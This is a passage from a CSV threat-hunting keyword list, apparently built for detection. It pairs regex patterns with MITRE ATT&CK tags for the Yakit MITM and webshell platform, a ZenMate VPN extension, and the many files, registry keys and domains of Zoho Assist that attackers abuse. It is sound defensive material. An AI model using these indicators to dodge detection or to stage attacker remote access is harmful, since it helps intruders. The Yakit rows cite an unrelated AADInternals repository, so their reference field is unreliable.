Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*?? MITM ????*",".{0,1000}\?\?\sMITM\s\?\?\?\?.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*\default-yakit.db*",".{0,1000}\\default\-yakit\.db.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*\set-proxy.ps1*",".{0,1000}\\set\-proxy\.ps1.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*\System32\yak.exe*",".{0,1000}\\System32\\yak\.exe.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*\yak.exe*",".{0,1000}\\yak\.exe.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & 
Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*MITMServerHijacking/MITMPluginLocalList*",".{0,1000}MITMServerHijacking\/MITMPluginLocalList.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*pwd86u1qwZ9PWevKqm1A3yAw==*",".{0,1000}pwd86u1qwZ9PWevKqm1A3yAw\=\=.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*PwDaBjJzgufjES89Rs4Lpq63O300R/kOz30WCLo6BxxX6QVEilwSlpClnG5cZaikTA==*",".{0,1000}PwDaBjJzgufjES89Rs4Lpq63O300R\/kOz30WCLo6BxxX6QVEilwSlpClnG5cZaikTA\=\=.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","#base64","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*pWDkVEtllTAK5h6cnhxNxDA==*",".{0,1000}pWDkVEtllTAK5h6cnhxNxDA\=\=.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Yakit-*-windows-amd64.exe*",".{0,1000}Yakit\-.{0,1000}\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and 
MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Yakit/1.0.0*",".{0,1000}Yakit\/1\.0\.0.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","user-agent","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*YAKIT_MITM*",".{0,1000}YAKIT_MITM.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*yakit-remote.json*",".{0,1000}yakit\-remote\.json.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*fdcgdnkidjaadafnichfpabhfomcebme*",".{0,1000}fdcgdnkidjaadafnichfpabhfomcebme.{0,1000}","greyware_tool_keyword","ZenMate VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "* -altgw *.zohoassist.com *",".{0,1000}\s\-altgw\s.{0,1000}\.zohoassist\.com\s.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist 
Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* -ms assist.zoho.com -p 443*",".{0,1000}\s\-ms\sassist\.zoho\.com\s\-p\s443.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* -rr_flag * -group * -fileTransferGateways *.zohoassist.com -ADMINAGENT*",".{0,1000}\s\-rr_flag\s.{0,1000}\s\-group\s.{0,1000}\s\-fileTransferGateways\s.{0,1000}\.zohoassist\.com\s\-ADMINAGENT.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* SELECT ProcessId FROM Win32_Process * Name='ZAAudioClient.exe'*",".{0,1000}\sSELECT\sProcessId\sFROM\sWin32_Process\s.{0,1000}\sName\=\'ZAAudioClient\.exe\'.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* ZA_Connect.exe*",".{0,1000}\sZA_Connect\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* ZAAudioClient.exe*",".{0,1000}\sZAAudioClient\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by 
attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* ZAFileTransfer.exe*",".{0,1000}\sZAFileTransfer\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* ZAService.exe*",".{0,1000}\sZAService\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.zohoassist.com.cn*",".{0,1000}\.zohoassist\.com\.cn.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.zohoassist.jp*",".{0,1000}\.zohoassist\.jp.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/ZA_Connect.exe*",".{0,1000}\/ZA_Connect\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/ZAAudioClient.exe*",".{0,1000}\/ZAAudioClient\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access 
software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/ZAFileTransfer.exe*",".{0,1000}\/ZAFileTransfer\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/ZAService.exe*",".{0,1000}\/ZAService\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\ZohoMeeting\*",".{0,1000}\\AppData\\Local\\ZohoMeeting\\.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\CurrentControlSet\Services\Zoho Assist-Remote Support*",".{0,1000}\\CurrentControlSet\\Services\\Zoho\sAssist\-Remote\sSupport.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\dctoolshardware.exe*",".{0,1000}\\dctoolshardware\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\InventoryApplicationFile\zaservice.exe*",".{0,1000}\\InventoryApplicationFile\\zaservice\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\log\FileTransferWindowAppLog.log*",".{0,1000}\\log\\FileTransferWindowAppLog\.log.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Root\InventoryApplicationFile\za_connect.exe*",".{0,1000}\\Root\\InventoryApplicationFile\\za_connect\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RSTemp\ZohoMeeting\*",".{0,1000}\\RSTemp\\ZohoMeeting\\.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SafeBoot\Network\Zoho Assist-Remote Support*",".{0,1000}\\SafeBoot\\Network\\Zoho\sAssist\-Remote\sSupport.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\Zoho Assist*",".{0,1000}\\SOFTWARE\\Zoho\sAssist.{0,1000}","greyware_tool_keyword","Zoho 
Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZA_Connect.exe*",".{0,1000}\\ZA_Connect\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZA_Upgrader*",".{0,1000}\\ZA_Upgrader.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZAAudioClient.exe*",".{0,1000}\\ZAAudioClient\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZAFileTransfer.exe*",".{0,1000}\\ZAFileTransfer\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZAService.exe*",".{0,1000}\\ZAService\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\ZAudioClientPipe_*ServerReadPipe*",".{0,1000}\\ZAudioClientPipe_.{0,1000}ServerReadPipe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZAudioClientPipe_*ServerWritePipe*",".{0,1000}\\ZAudioClientPipe_.{0,1000}ServerWritePipe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZMAgent.exe*",".{0,1000}\\ZMAgent\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Zoho Assist\Zoho Assist Remote support*",".{0,1000}\\Zoho\sAssist\\Zoho\sAssist\sRemote\ssupport.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZohoMeeting.7z*",".{0,1000}\\ZohoMeeting\.7z.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZohoMeeting.exe*",".{0,1000}\\ZohoMeeting\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZohoMeeting\agent.exe*",".{0,1000}\\ZohoMeeting\\agent\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\zohomeeting\agent.exe*",".{0,1000}\\zohomeeting\\agent\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZohoMeeting\agent_ui.exe*",".{0,1000}\\ZohoMeeting\\agent_ui\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZohoMeeting\Connect.exe*",".{0,1000}\\ZohoMeeting\\Connect\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZohoMeeting\Connection.conf*",".{0,1000}\\ZohoMeeting\\Connection\.conf.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\ZohoMeeting\log\*.log*",".{0,1000}\\ZohoMeeting\\log\\.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZohoMeeting\ViewerUI.exe*",".{0,1000}\\ZohoMeeting\\ViewerUI\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZohoTray.exe*",".{0,1000}\\ZohoTray\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZohoURS.exe*",".{0,1000}\\ZohoURS\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ZohoURSService.exe*",".{0,1000}\\ZohoURSService\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*_Classes\zohoassistlaunchv2*",".{0,1000}_Classes\\zohoassistlaunchv2.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered 
Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*assist.zoho.com*",".{0,1000}assist\.zoho\.com.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*downloads.zohocdn.com*",".{0,1000}downloads\.zohocdn\.com.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*downloads.zohodl.com.cn*",".{0,1000}downloads\.zohodl\.com\.cn.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*gateway.zohoassist.com*",".{0,1000}gateway\.zohoassist\.com.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://*.zoho.com/pconnect*",".{0,1000}https\:\/\/.{0,1000}\.zoho\.com\/pconnect.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://*.zohoassist.com/w_socket*",".{0,1000}https\:\/\/.{0,1000}\.zohoassist\.com\/w_socket.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho 
Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://assist.zoho.com/assist-join?key=*",".{0,1000}https\:\/\/assist\.zoho\.com\/assist\-join\?key\=.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://assist.zoho.com/customer-session-details?client_token=*",".{0,1000}https\:\/\/assist\.zoho\.com\/customer\-session\-details\?client_token\=.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://assist.zoho.com/join?join_source=EMAIL_INVITE*",".{0,1000}https\:\/\/assist\.zoho\.com\/join\?join_source\=EMAIL_INVITE.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://assist.zoho.com/join-session?key=*",".{0,1000}https\:\/\/assist\.zoho\.com\/join\-session\?key\=.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://assist.zoho.com/org/*",".{0,1000}https\:\/\/assist\.zoho\.com\/org\/.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho 
Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://assist.zoho.com/viewer-assist*",".{0,1000}https\:\/\/assist\.zoho\.com\/viewer\-assist.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://pubsub.zoho.com/*_deskUserPresence/pubsub*",".{0,1000}https\:\/\/pubsub\.zoho\.com\/.{0,1000}_deskUserPresence\/pubsub.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://us4-wms6.zoho.com*",".{0,1000}https\:\/\/us4\-wms6\.zoho\.com.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ProductName:Zoho%%20Assist* apptype:ATTENDEE*",".{0,1000}ProductName\:Zoho\%\%20Assist.{0,1000}\sapptype\:ATTENDEE.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*program files (x86)\zohomeeting*",".{0,1000}program\sfiles\s\(x86\)\\zohomeeting.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - 
